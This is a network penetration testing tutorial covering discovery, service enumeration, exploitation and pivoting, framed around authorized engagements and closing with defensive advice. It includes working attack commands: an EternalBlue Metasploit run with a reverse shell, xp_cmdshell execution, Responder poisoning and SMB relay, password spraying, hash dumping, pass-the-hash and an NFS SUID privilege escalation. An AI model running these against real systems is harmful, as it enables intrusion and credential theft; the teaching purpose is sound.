Most companies lock their front door but leave the side windows open. A network penetration test finds those windows — open ports running outdated services, misconfigured protocols, credentials reused across the infrastructure, and segmentation gaps that let an attacker pivot from a compromised workstation all the way to domain controllers.

TL;DR

  • Network pentesting follows a structured methodology: discovery → enumeration → vulnerability analysis → exploitation → post-exploitation → pivoting
  • Nmap is the foundation; learn it deeply before reaching for specialized tools
  • The most impactful findings come from: default credentials, unpatched services, misconfigured SMB/NFS/SNMP, and overly permissive network segmentation
  • Pivoting and tunneling let you reach internal segments from a compromised host — this is where network pentests reveal their real value
  • Document everything: source IPs, timestamps, commands run, findings — your report is the deliverable

The Engagement Context

Before touching a packet, understand the scope:

  • Black box: No prior information — simulate an external attacker
  • Gray box: Some information provided (network ranges, domain names, maybe user accounts)
  • White box: Full access to architecture diagrams, configs, credentials — thorough but less realistic

Get written authorization specifying:

  • In-scope IP ranges or CIDRs
  • Out-of-scope systems (production databases, critical infrastructure)
  • Permitted test windows (business hours vs. 24/7)
  • Point of contact in case something breaks

This isn’t optional. Unauthorized testing is a criminal offense in most jurisdictions, and the signed scope document is also what protects you when a scan takes something down mid-engagement.
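A guard of the kind a tester keeps wrapped around the scanning shell, added here as an example (it is not from the original article and not part of any tool the article mentions): it refuses to run anything against an address outside the authorized CIDRs or inside the exclusion list, and appends a timestamped evidence line for every command, which also covers the "document everything" point from the TL;DR. The ranges, the log path and the commands in the usage comment are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example: scope guard + evidence log around pentest commands.
# Ranges and paths below are illustrative assumptions, not from the article.

IN_SCOPE="10.10.0.0/24 10.20.0.0/16"            # authorized CIDRs from the engagement letter
OUT_OF_SCOPE="10.10.0.5 10.20.7.0/24"            # explicit exclusions (e.g. prod DB, OT segment)
EVIDENCE_LOG="${EVIDENCE_LOG:-./evidence.log}"   # one line per command run, for the report

# ip_to_int 10.10.0.100 -> 168427620
ip_to_int() {
  local IFS=.
  set -- $1
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_cidr <ip> <cidr-or-ip>: true when ip is inside cidr (a bare IP means /32)
in_cidr() {
  local ip=$1 cidr=$2 net bits mask
  net=${cidr%/*}
  bits=${cidr#*/}
  [ "$bits" = "$cidr" ] && bits=32
  if [ "$bits" -eq 0 ]; then
    mask=0
  else
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
  fi
  [ $(( $(ip_to_int "$ip") & mask )) -eq $(( $(ip_to_int "$net") & mask )) ]
}

# in_scope <ip>: exclusions win over inclusions
in_scope() {
  local ip=$1 r
  for r in $OUT_OF_SCOPE; do in_cidr "$ip" "$r" && return 1; done
  for r in $IN_SCOPE;     do in_cidr "$ip" "$r" && return 0; done
  return 1
}

# run_scoped <target-ip> <command...>: refuse out-of-scope targets, record everything else
run_scoped() {
  local target=$1 ts src rc
  shift
  ts=$(date -u +%Y-%m-%dT%H:%M:%SZ)
  src=$(hostname -I 2>/dev/null | awk '{print $1}')   # tester's source IP (Linux); empty elsewhere
  if ! in_scope "$target"; then
    printf '%s src=%s target=%s REFUSED out-of-scope: %s\n' "$ts" "${src:-unknown}" "$target" "$*" >>"$EVIDENCE_LOG"
    echo "refused: $target is not in scope" >&2
    return 2
  fi
  "$@"
  rc=$?
  printf '%s src=%s target=%s rc=%s cmd: %s\n' "$ts" "${src:-unknown}" "$target" "$rc" "$*" >>"$EVIDENCE_LOG"
  return "$rc"
}

# Usage (real commands, not executed here):
#   run_scoped 10.10.0.100 nmap -sV -sC -O 10.10.0.100 -oA scan_baseline
#   run_scoped 10.10.0.5   nmap -p- 10.10.0.5     # excluded host: refused, logged, exit code 2
```

Exclusions are checked before inclusions on purpose: a production database that sits inside an authorized /24 must still be refused.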


Phase 1: Discovery — Find What’s Alive

Passive Reconnaissance

Before sending a single packet to the target, gather intelligence from public sources. Anything that queries the target’s own nameservers (subdomain brute-force, zone transfer attempts) is active rather than passive, so keep it for the discovery phase if stealth matters:

Terminal window
# DNS enumeration via a public resolver (many resolvers refuse ANY per RFC 8482; fall back to explicit record types)
dig @8.8.8.8 target.com any
dig @8.8.8.8 target.com MX
subfinder -d target.com # passive subdomain enumeration (certificate logs, search engines, DNS datasets)
fierce --domain target.com # subdomain brute-force (active: it queries the target's nameservers)
# BGP/ASN lookup — find all IP ranges the organization announces
whois AS12345 # ASN registration record; the announced prefixes need an IRR query (e.g. RADB) or a BGP looking glass
amass intel -org "Target Corp"

ICMP Host Discovery

The traditional ping sweep — fast but often blocked:

Terminal window
# Nmap ping sweep (no port scan)
nmap -sn 10.10.0.0/24
# Send ICMP echo requests without port scan
nmap -sn -PE 10.10.0.0/24
# When ICMP is blocked — ARP discovery (local network only)
nmap -sn -PR 192.168.1.0/24
arp-scan --localnet

TCP/UDP Discovery Without Full Scan

When you need to be quieter than a full port scan:

Terminal window
# TCP SYN to a few common ports instead of ICMP; --send-ip forces IP-level probes even on the local segment, where Nmap would otherwise just ARP
nmap -sn --send-ip -PS22,80,443,3389,8080 10.10.0.0/24
# Use masscan for high-speed discovery across large ranges
masscan -p80,443,22,3389 10.0.0.0/8 --rate=10000 -oL masscan_results.txt

Phase 2: Port Scanning and Service Enumeration

The Nmap Baseline

Terminal window
# Standard scan — top 1000 ports, service detection, OS detection
nmap -sV -sC -O 10.10.0.100 -oA scan_baseline
# Full port scan — all 65535 ports
nmap -p- -T4 10.10.0.100 -oA scan_fullport
# UDP scan (slow but finds SNMP, DNS, TFTP, NTP)
nmap -sU -p 53,67,68,69,111,123,137,138,161,500 10.10.0.0/24
# Aggressive scan — everything at once
nmap -A -p- 10.10.0.100 -oA scan_aggressive

Nmap output formats:

  • -oN — human-readable
  • -oX — XML (import into Metasploit or reporting tools)
  • -oG — grepable
  • -oA — all three simultaneously
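The grepable format is the one you end up scripting against, so here is an added example (not code from the original article) of what that looks like: a few shell functions that take `-oG` output on stdin and emit open ports, the hosts exposing a given port, and the version strings worth cross-referencing later. The scan output embedded in `sample_scan` is constructed for the demonstration and is not a real scan; the hosts and versions in it are assumptions.

```shell
#!/usr/bin/env bash
# Added example: turn grepable Nmap output (-oG) into per-service target lists.
# The scan output below is constructed for illustration; it is not a real scan.

sample_scan() {
  printf '%b\n' \
    '# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.10.0.0/24' \
    'Host: 10.10.0.100 ()\tStatus: Up' \
    'Host: 10.10.0.100 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41/, 445/open/tcp//microsoft-ds//Windows Server 2008 R2 microsoft-ds/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)' \
    'Host: 10.10.0.101 ()\tPorts: 161/open/udp//snmp//SNMPv1 server (public)/\tIgnored State: closed (999)' \
    '# Nmap done -- 256 IP addresses (2 hosts up) scanned in 192.10 seconds'
}

# open_ports: stdin = -oG output; stdout = "ip port/proto service version" for open ports only.
# Each Ports: entry is port/state/proto/owner/service/rpcinfo/version/ ; filtered and closed are dropped.
open_ports() {
  awk '/^Host: / && /Ports: / {
    ip = $2
    ports = $0
    sub(/^.*Ports: /, "", ports)
    sub(/[ \t]+Ignored State:.*$/, "", ports)
    n = split(ports, p, ", ")
    for (j = 1; j <= n; j++) {
      split(p[j], f, "/")
      if (f[2] == "open")
        print ip, f[1] "/" f[3], f[5], (f[7] == "" ? "-" : f[7])
    }
  }'
}

# targets_for <port/proto>: stdin = -oG output; stdout = hosts with that port open
targets_for() {
  open_ports | awk -v want="$1" '$2 == want { print $1 }'
}

# service_versions: stdin = -oG output; stdout = unique version strings to check against searchsploit/NVD
service_versions() {
  open_ports | awk '$4 != "-" { s = $4; for (i = 5; i <= NF; i++) s = s " " $i; print s }' | sort -u
}

# Usage against a live scan (not run here):
#   nmap -sV -oG - 10.10.0.0/24 | targets_for 445/tcp | xargs -I{} enum4linux-ng -A {}
#   nmap -sV -oG - 10.10.0.0/24 | service_versions | while read -r v; do searchsploit "$v"; done
```

Feeding `-oG -` straight into these functions lets the SMB, SNMP and database enumeration below start while the full `-p-` scan is still running.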

Service-Specific Enumeration

Once you know what’s running, enumerate each service deeply.

SMB (445/TCP) — Windows File Sharing

SMB is the most common source of critical findings in Windows environments.

Terminal window
# Enumerate shares, users, OS version
enum4linux-ng -A 10.10.0.100
# Nmap SMB scripts
nmap --script smb-enum-shares,smb-enum-users,smb-vuln-ms17-010 10.10.0.100
# Check for EternalBlue (MS17-010)
nmap --script smb-vuln-ms17-010 10.10.0.100
# List shares without credentials (null session)
smbclient -L //10.10.0.100 -N
# Connect to a share
smbclient //10.10.0.100/SharedDocs -N
# Mount the share
mount -t cifs //10.10.0.100/SharedDocs /mnt/smb -o guest

What to look for in SMB:

  • World-readable shares with sensitive documents (passwords, configs, HR data)
  • EternalBlue (MS17-010) — unauthenticated RCE
  • SMB signing disabled — enables relay attacks
  • NTLMv1 negotiation enabled — weak hash, crackable

FTP (21/TCP) — File Transfer Protocol

Terminal window
# Check for anonymous login
nmap --script ftp-anon 10.10.0.100
ftp 10.10.0.100 # username: anonymous, password: anything
# Check for bounce attacks, misconfigurations
nmap --script ftp-bounce,ftp-syst,ftp-vuln-cve2010-4221 10.10.0.100

Anonymous FTP access is an instant finding. Look for:

  • Configuration files
  • Backup archives
  • Database exports
  • Any file that shouldn’t be public

SSH (22/TCP)

Terminal window
# Check authentication methods and algorithms
nmap --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos 10.10.0.100
# Banner grab — version fingerprinting
nc 10.10.0.100 22
# Brute-force (only with explicit permission and rate limiting)
hydra -l root -P /opt/wordlists/rockyou.txt ssh://10.10.0.100 -t 4

Out-of-date OpenSSH builds (anything before the 7.x line, and unpatched later releases) carry published CVEs; check the exact banner version against the advisories rather than assuming. Weak algorithm offers (hmac-md5, arcfour, CBC ciphers, ssh-dss host keys) are findings in their own right, even without exploitation.


SNMP (161/UDP) — Network Management Protocol

Frequently forgotten, often configured with default community strings:

Terminal window
# Brute-force community strings
onesixtyone -c /usr/share/wordlists/metasploit/snmp_default_pass.txt 10.10.0.100
# Enumerate with default "public" community string
snmpwalk -v2c -c public 10.10.0.100
snmpwalk -v2c -c public 10.10.0.100 1.3.6.1.2.1.1 # system info
snmpwalk -v2c -c public 10.10.0.100 1.3.6.1.2.1.25.4.2 # running processes
snmpwalk -v2c -c public 10.10.0.100 1.3.6.1.4.1.77.1.2.25 # Windows users
# nmap SNMP scripts
nmap -sU -p 161 --script snmp-brute,snmp-info,snmp-interfaces 10.10.0.100

SNMP with public/private community strings exposes system information, network interfaces, routing tables, ARP cache, running processes, and installed software to anyone who can guess the string: in v1 and v2c the community string is the only authentication, and it travels in cleartext.


SMTP (25/587/TCP) — Email Server

Terminal window
# Enumerate valid users (VRFY, EXPN, RCPT TO)
smtp-user-enum -M VRFY -U /opt/wordlists/usernames.txt -t 10.10.0.100
nmap --script smtp-enum-users,smtp-open-relay 10.10.0.100
# Manual open-relay check: sender AND recipient must both be outside the target's own domains.
# A 250 to RCPT TO for an external recipient is relaying; delivery to @target.com is just normal inbound mail.
# Use a mailbox you control as the recipient so you can confirm the message actually arrived.
telnet 10.10.0.100 25
EHLO test
MAIL FROM: <tester@external-example.org>
RCPT TO: <you@tester-controlled.example>
DATA
Subject: Relay test
# (blank line here separates headers from body)
relay test body
.

Open mail relay = instant critical finding. Valid user enumeration enables targeted password attacks.


RDP (3389/TCP) — Remote Desktop

Terminal window
# Fingerprint RDP: encryption/NLA settings, NTLM info leak (hostname, domain, OS build without credentials), MS12-020 (CVE-2012-0002)
nmap --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 10.10.0.100
# BlueKeep (CVE-2019-0708), unauthenticated RCE on Windows 7 / Server 2008 R2 and older, is NOT what rdp-vuln-ms12-020 tests.
# Use the Metasploit checker (safe check, no exploitation):
msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS 10.10.0.100; run; exit"
# NLA disabled (see rdp-enum-encryption) means the login screen is reachable before authentication; record it as a finding

Database Services

Terminal window
# MySQL (3306)
nmap --script mysql-enum,mysql-info,mysql-empty-password 10.10.0.100
mysql -h 10.10.0.100 -u root -p # try empty password, "root", "password"
# MSSQL (1433)
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-config 10.10.0.100
# xp_cmdshell if the sa account is enabled with an empty/default password (it is off by default and needs sysadmin to turn on):
impacket-mssqlclient sa:@10.10.0.100
SQL> enable_xp_cmdshell
SQL> EXEC xp_cmdshell 'whoami'
# PostgreSQL (5432)
nmap --script pgsql-brute 10.10.0.100
psql -h 10.10.0.100 -U postgres -W # default credentials
# Redis (6379) — no auth unless requirepass is set; protected mode only refuses remote clients when bind is left at its default
redis-cli -h 10.10.0.100
> INFO
> CONFIG GET *
> KEYS *

Databases exposed to the network with default or empty credentials are critical findings. MSSQL’s xp_cmdshell gives OS-level code execution directly from SQL.


Phase 3: Vulnerability Analysis

Automated Scanning

After manual enumeration, run a vulnerability scanner:

Terminal window
# Nessus (commercial, most comprehensive)
# OpenVAS (open source alternative)
# Nuclei — fast, template-based
# Nuclei with network templates
nuclei -l targets.txt -t network/ -o nuclei_results.txt
# Metasploit's vulns db_nmap integration
msfconsole
msf> db_nmap -sV -p- 10.10.0.100
msf> vulns

Don’t let automated scanners do your thinking. They miss context-specific vulnerabilities and generate false positives. Use them to augment manual enumeration, not replace it.


Searching for Known Exploits

Terminal window
# searchsploit — local Exploit-DB copy
searchsploit "OpenSSH 7.4"
searchsploit --cve CVE-2021-41773 # Apache path traversal
# Check NVD directly for CVE details
# Cross-reference version from Nmap -sV output with CVE databases

Phase 4: Exploitation

Credential Attacks

The most reliable path to initial access in internal network tests.

Terminal window
# Password spraying — one password against many users; read the domain lockout threshold first and stay one attempt under it per observation window
crackmapexec smb 10.10.0.0/24 -u users.txt -p "Winter2026!" --continue-on-success
# Default credential check across all discovered services
crackmapexec smb 10.10.0.0/24 -u admin -p admin
hydra -C /opt/wordlists/default-credentials.txt ssh://10.10.0.100
# Hash dumping after gaining local admin on a host
crackmapexec smb 10.10.0.100 -u admin -p password --sam # local SAM: user:rid:LM:NT:::
crackmapexec smb 10.10.0.100 -u admin -p password --lsa # LSA secrets: cached domain logons, service account passwords
# Crack what you captured (different formats need different modes)
hashcat -m 1000 -a 0 hashes.txt /opt/wordlists/rockyou.txt # NT hashes from SAM/NTDS dumps
hashcat -m 5600 -a 0 hashes.txt /opt/wordlists/rockyou.txt # Net-NTLMv2 challenge/responses from Responder

LLMNR/NBT-NS Poisoning

When a Windows host can’t resolve a name via DNS, it falls back to LLMNR (multicast) and NBT-NS (broadcast). An attacker on the same segment can answer those queries, claim to be the requested host, and capture the Net-NTLMv2 challenge/response the client sends. These are not NT hashes: they can be cracked offline or relayed while the exchange is live, but not used for pass-the-hash.

Terminal window
# Start Responder on the local interface (-r NetBIOS wredir answers, -d DHCP answers, -w WPAD proxy, -v verbose)
# -d hands out DHCP responses and can disrupt clients; drop it on fragile networks
responder -I eth0 -rdwv
# Wait for authentication attempts — they come from:
# - Users navigating to non-existent shares (\\typo\share)
# - Misconfigured GPOs, logon scripts and scheduled tasks pointing at decommissioned hosts
# - Print spooler bugs
# Captures land in Responder's logs/ directory (/usr/share/responder/logs on Kali), one file per protocol and source IP
# Crack (hashcat -m 5600) or relay them

This is one of the highest-yield techniques in internal network tests: captured Net-NTLMv2 responses can be cracked offline, or the live authentication can be relayed for immediate access to another host.
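Responder re-logs every authentication attempt, so a day of capture yields many duplicate entries per user and, occasionally, Net-NTLMv1 responses mixed in with the v2 ones (a finding on its own, since v1 is crackable regardless of password strength). The triage below is an added example, not part of the original article or of Responder itself: it tells the two formats apart by field length, keeps one response per DOMAIN\user, and writes separate hashcat input files for mode 5600 and mode 5500. The capture lines in `sample_captures` are constructed with fake hex of the right lengths, and the usernames, domains and log path are assumptions.

```shell
#!/usr/bin/env bash
# Added example: triage Responder captures before cracking.
# Sample lines are constructed (fake challenges/responses of the right lengths), not real captures.

sample_captures() {
  # Net-NTLMv2: user::DOMAIN:server_challenge(16 hex):NTProofStr(32 hex):blob
  # Net-NTLMv1: user::DOMAIN:LM_response(48 hex):NT_response(48 hex):server_challenge(16 hex)
  cat <<'EOF'
jsmith::CORP:1122334455667788:a1b2c3d4e5f60718293a4b5c6d7e8f90:0101000000000000c0653150de09b201000000000200080043004f00520050000000000000000000
JSMITH::corp:99aabbccddeeff00:0f1e2d3c4b5a69788796a5b4c3d2e1f0:0101000000000000d0653150de09b201000000000200080043004f00520050000000000000000000
svc_backup::CORP:0011223344556677:ffeeddccbbaa99887766554433221100:0101000000000000e0653150de09b201000000000200080043004f00520050000000000000000000
admin::WORKGROUP:25b2b477ce1ed0bd25b2b477ce1ed0bd25b2b477ce1ed0bd:4ebd5f9c4ebd5f9c4ebd5f9c4ebd5f9c4ebd5f9c4ebd5f9c:1122334455667788
this line is not a capture
EOF
}

# triage_hashes: stdin = Responder log lines; stdout = "<hashcat mode> <line>", one per account.
# Duplicates for the same DOMAIN\user (case-insensitive) are dropped: Responder re-logs every
# attempt, and hashcat only needs one response per account. Malformed lines are skipped.
triage_hashes() {
  awk -F: '{
    key = tolower($3 "\\" $1)
    if (NF < 6 || seen[key]++) next
    if (length($4) == 16 && length($5) == 32)      mode = 5600   # Net-NTLMv2
    else if (length($4) == 48 && length($5) == 48) mode = 5500   # Net-NTLMv1: report the downgrade itself
    else next
    print mode, $0
  }'
}

# write_hashcat_inputs <dir>: stdin = Responder log lines; writes <dir>/netntlmv2.txt and <dir>/netntlmv1.txt
write_hashcat_inputs() {
  mkdir -p "$1"
  triage_hashes | awk -v dir="$1" '{
    file = ($1 == 5600) ? dir "/netntlmv2.txt" : dir "/netntlmv1.txt"
    sub(/^[0-9]+ /, "")
    print > file
  }'
}

# Usage (not run here):
#   cat /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt | write_hashcat_inputs ./hashes
#   hashcat -m 5600 -a 0 ./hashes/netntlmv2.txt /opt/wordlists/rockyou.txt
#   hashcat -m 5500 -a 0 ./hashes/netntlmv1.txt /opt/wordlists/rockyou.txt
# These are challenge/responses, not NT hashes: crack them or relay the live exchange,
# but do not expect pass-the-hash to work with them.
```

Any line that lands in `netntlmv1.txt` means a client on that segment still negotiates NTLMv1, which goes into the report independently of whether the password cracks.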


SMB Relay Attack

Instead of cracking captured hashes, relay them directly to other hosts:

Terminal window
# Prerequisite: SMB signing not required on the target, and the relayed user must have rights there (local admin for secretsdump)
crackmapexec smb 10.10.0.0/24 --gen-relay-list relay_targets.txt
# Set up ntlmrelayx to relay to the targets (-i opens an interactive SMB shell on each success)
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i
# Trigger captures with Responder, with SMB and HTTP turned off in Responder.conf so ntlmrelayx owns those ports
responder -I eth0 -rdwv
# When a victim authenticates to Responder's poisoned name, the live NTLM exchange is forwarded to the target list
# A host cannot be relayed back to itself (closed by MS08-068); only cross-host relay works
# On success: shell, secretsdump, or command execution

Exploiting Known CVEs

Terminal window
# EternalBlue — MS17-010 (Windows 7/2008 without patches)
msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 10.10.0.100
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 10.10.0.1
msf> run
# Apache Log4j — log4shell
# PrintNightmare — CVE-2021-34527
# ProxyShell — Exchange CVE-2021-34473

Phase 5: Post-Exploitation and Pivoting

Getting initial access is one thing. Pivoting deeper into the network is where network pentests reveal their real value — demonstrating what an attacker can reach from a single compromised host.

Local Enumeration on Compromised Host

Terminal window
# Who are we, what can we do?
whoami /all
net user
net localgroup administrators
# Network interfaces and routing
ipconfig /all # Windows
ip addr; ip route # Linux
# What can we reach?
arp -a # local ARP cache — hosts we've spoken to
netstat -ano # active connections and listening ports
route print # routing table — what subnets are reachable?

Port Forwarding — Reach Services Behind a Host

You’ve compromised a host in the DMZ. The database server is in an internal subnet, reachable from the DMZ host but not from your attack machine.

SSH Local Port Forward:

Terminal window
# Forward local port 1433 through the DMZ host to the internal DB
ssh -L 1433:10.20.0.50:1433 user@dmz_host
# Now connect to the DB via the local end of the tunnel (impacket takes the port as a flag, not in the target string)
impacket-mssqlclient sa:@127.0.0.1 -port 1433

Chisel — works when SSH isn’t available:

Terminal window
# On attack machine (server)
chisel server --reverse --port 8080
# On compromised host (client)
chisel client 10.10.0.1:8080 R:1433:10.20.0.50:1433
# Now localhost:1433 on attack machine → internal DB

SOCKS Proxy — Route All Traffic Through a Compromised Host

A SOCKS proxy lets you use any tool through the compromised host as if your attack machine were on the internal network:

Terminal window
# SSH dynamic forwarding — creates SOCKS5 proxy on local port 1080
ssh -D 1080 user@compromised_host
# Use proxychains to route tools through the proxy
# Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 10.20.0.0/24 # scan internal subnet via pivot
proxychains crackmapexec smb 10.20.0.0/24 -u admin -p password
# Metasploit SOCKS plugin
msf> use auxiliary/server/socks_proxy
msf> set SRVPORT 1080
msf> run -j

Metasploit Pivoting

If you have a Meterpreter session, pivot is built in:

Terminal window
# Add a route to an internal subnet via the compromised session
msf> route add 10.20.0.0/24 1 # session 1 is the pivot host
# Now Metasploit routes traffic through the session
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 10.20.0.0/24
msf> run
# Or use socks proxy module for external tools
msf> use auxiliary/server/socks_proxy

Double Pivoting

Sometimes you need to pivot through two hosts to reach a deeply segmented network:

Attack Machine → DMZ Host → Internal Host → Core Network
Terminal window
# First pivot: SSH SOCKS proxy through DMZ host
ssh -D 1080 user@dmz_host
# Second pivot: SSH SOCKS proxy through the internal host, with the SSH connection itself tunneled via the first proxy
proxychains ssh -D 1081 user@internal_host
# proxychains reads one config file; write a second one pointing at 1081 (socks5 127.0.0.1 1081) and select it with -f
# Traffic then flows attack machine -> 1081 -> DMZ host -> internal host -> core network
proxychains4 -f proxychains_core.conf nmap -sT -Pn 10.30.0.0/24

Credential Pivoting

Once you have credentials or hashes from one host, test them across the rest of the network:

Terminal window
# Pass-the-hash — authenticate with NTLM hash (no plaintext needed)
crackmapexec smb 10.10.0.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c --local-auth
# Password spraying with recovered credentials
crackmapexec smb 10.10.0.0/24 -u "john.smith" -p "Summer2026!"

Credential reuse across systems is one of the most common findings in network pentests. A single recovered password often unlocks dozens of hosts.


Common Critical Findings in Network Pentests

| Finding | Discovery method | Impact |
| --- | --- | --- |
| EternalBlue (MS17-010) | nmap --script smb-vuln-ms17-010 | Unauthenticated RCE |
| Default credentials on network devices | Manual testing, Hydra | Full device control |
| LLMNR/NBT-NS poisoning viable | Responder | Net-NTLMv2 capture (crack or relay) |
| SMB signing not required | crackmapexec --gen-relay-list | SMB relay, code execution |
| SNMP public community string | onesixtyone, snmpwalk | Full host enumeration |
| Anonymous FTP with sensitive data | nmap --script ftp-anon | Data breach |
| Database with default/empty password | Manual testing | Full data access, OS command execution |
| Overly permissive network segmentation | Routing table analysis post-compromise | Lateral movement to all segments |
| Exposed Redis/MongoDB/Elasticsearch | Port scan + direct connection | Unauthenticated data access |
| NFS shares exported to * | showmount -e | File system access without authentication |

NFS — Network File System Enumeration

Often forgotten, frequently misconfigured:

Terminal window
# List exported shares
showmount -e 10.10.0.100
# Mount a share (if exported to *)
mount -t nfs 10.10.0.100:/opt/backups /mnt/nfs
# If the export is rw and configured with no_root_squash (the default, root_squash, maps your root to nobody),
# root on your attack machine writes files that keep uid 0 on the target's filesystem:
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# Then, from any low-privilege foothold on the target: /opt/backups/bash -p  (-p stops bash dropping the effective uid)
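The same misconfiguration is easier to find from the server side than through `showmount`, which never shows squash options. As an added example (not from the original article), here is a small `/etc/exports` audit that flags any-client exports, world-writable exports, `no_root_squash` and `insecure`, shown against a weak exports file and a hardened one. Both files are constructed samples; the paths and client ranges are assumptions.

```shell
#!/usr/bin/env bash
# Added example: audit /etc/exports for the mistakes that make the SUID trick above possible.
# Both export files are constructed samples; the paths and client ranges are assumptions.

weak_exports() {
  cat <<'EOF'
# backups pushed from every server
/opt/backups *(rw,sync,no_root_squash)
/srv/share 10.10.0.0/24(ro,sync,root_squash)
/home/dev (rw,insecure)
EOF
}

hardened_exports() {
  cat <<'EOF'
/opt/backups 10.10.0.50(rw,sync,root_squash,secure)
/srv/share 10.10.0.0/24(ro,sync,root_squash)
EOF
}

# audit_exports: stdin = /etc/exports content; stdout = "path: finding; finding" per risky client entry.
# Flags: any-client exports (*, 0.0.0.0/0, or a bare "(opts)" with no client), world-writable,
# no_root_squash (remote root keeps uid 0 on the share), insecure (requests from ports > 1024 accepted,
# so any local user on a client can forge AUTH_SYS uids).
audit_exports() {
  awk '
    /^[ \t]*(#|$)/ { next }
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        client = $i; opts = ""
        if (match($i, /\(.*\)/)) {
          client = substr($i, 1, RSTART - 1)
          opts   = substr($i, RSTART + 1, RLENGTH - 2)
        }
        world = (client == "" || client == "*" || client == "0.0.0.0/0")
        msg = ""
        if (world)                              msg = msg "exported to every client; "
        if (world && opts ~ /(^|,)rw(,|$)/)     msg = msg "world-writable; "
        if (opts ~ /(^|,)no_root_squash(,|$)/)  msg = msg "no_root_squash: remote root can plant SUID binaries; "
        if (opts ~ /(^|,)insecure(,|$)/)        msg = msg "insecure: unprivileged source ports accepted, client users can forge uids; "
        if (msg != "") { sub(/; $/, "", msg); print path ": " msg }
      }
    }'
}

# Usage on a compromised NFS server, or in a defender's config review (not run here):
#   audit_exports < /etc/exports
```

The hardened file pins each export to the hosts that need it, keeps the default `root_squash`, and states `secure` explicitly; the audit returns nothing for it, which is the condition to aim for.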

What You Can Do Today

If you’re a network security engineer:

  1. Disable LLMNR and NBT-NS in Group Policy — it eliminates an entire attack category
  2. Enforce SMB signing on all Windows hosts — prevents relay attacks
  3. Audit network segmentation — can a workstation reach your core infrastructure directly?
  4. Change all default credentials on network devices, printers, and management interfaces
  5. Run nmap -sU -p 161 10.0.0.0/8 to find every SNMP listener, then test each one with onesixtyone against the default community-string list; a listener alone is not the finding, a guessable string is

If you’re a penetration tester:

  1. Don’t just scan the top 1000 ports — run a full -p- scan in parallel with enumeration
  2. Responder first thing in internal tests — let it collect hashes while you enumerate
  3. For pivoting, keep Chisel in your toolkit — it works when SSH and Metasploit can’t
  4. Document your pivot chain in detail — the report needs to show the path from internet to crown jewels

If you’re a CISO:

  1. Internal network pentests should be scoped to reach from “external attacker gets one workstation” to “how far can they go” — not just perimeter testing
  2. Network segmentation effectiveness should be validated annually — policy and reality often diverge
  3. Password spraying tests reveal credential hygiene — include it in your test scope

